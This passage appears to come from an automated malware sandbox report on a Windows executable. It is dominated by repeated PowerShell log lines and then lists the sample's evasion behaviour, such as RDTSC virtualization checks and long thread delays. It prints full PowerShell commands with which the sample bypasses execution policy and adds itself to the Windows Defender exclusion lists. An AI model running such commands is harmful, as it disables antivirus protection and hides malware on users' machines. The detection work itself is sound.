        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeAPI/Special instruction interceptor: Address: 4BD2CBD
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeAPI/Special instruction interceptor: Address: 3742CBD
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeRDTSC instruction interceptor: First address: 4B6912E second address: 4B6912E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FE748CFC565h 0x0000000a test bh, ch 0x0000000c jmp 00007FE748CFC811h 0x00000011 test dl, bl 0x00000013 inc ebp 0x00000014 inc ebx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeRDTSC instruction interceptor: First address: 36D912E second address: 36D912E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FE7490296F5h 0x0000000a test bh, ch 0x0000000c jmp 00007FE7490299A1h 0x00000011 test dl, bl 0x00000013 inc ebp 0x00000014 inc ebx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeMemory allocated: 345A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeMemory allocated: 365A0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeWindow / User API: threadDelayed 2610Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeWindow / User API: threadDelayed 7209Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7530Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2169Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7466Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2248Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8028Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1657Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeAPI coverage: 2.0 %
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe TID: 2216Thread sleep count: 36 > 30Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe TID: 2216Thread sleep time: -33204139332677172s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe TID: 2264Thread sleep count: 2610 > 30Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe TID: 2264Thread sleep count: 7209 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5816Thread sleep time: -6456360425798339s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep count: 7466 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1836Thread sleep count: 2248 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3208Thread sleep count: 8028 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3208Thread sleep count: 1657 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1956Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_004065DA FindFirstFileW,FindClose,3_2_004065DA
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_004059A9
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: yVVZdG2NJX.exe, 00000003.00000002.2589172205.000000000429C000.00000004.00000020.00020000.00000000.sdmp, yVVZdG2NJX.exe, 00000003.00000002.2589172205.0000000004248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeAPI call chain: ExitProcess graph end nodegraph_0-4314
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeAPI call chain: ExitProcess graph end nodegraph_0-4468
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_00404243 LdrInitializeThunk,SendMessageW,0_2_00404243
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeCode function: 0_2_703D1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_703D1B63
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Adds a directory exclusion to Windows Defender
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe'
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe'Jump to behavior
        Bypasses PowerShell execution policy
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Users\user\Desktop\yVVZdG2NJX.exe "C:\Users\user\Desktop\yVVZdG2NJX.exe"Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yVVZdG2NJX.exe'Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe'Jump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeQueries volume information: C:\Users\user\Desktop\yVVZdG2NJX.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
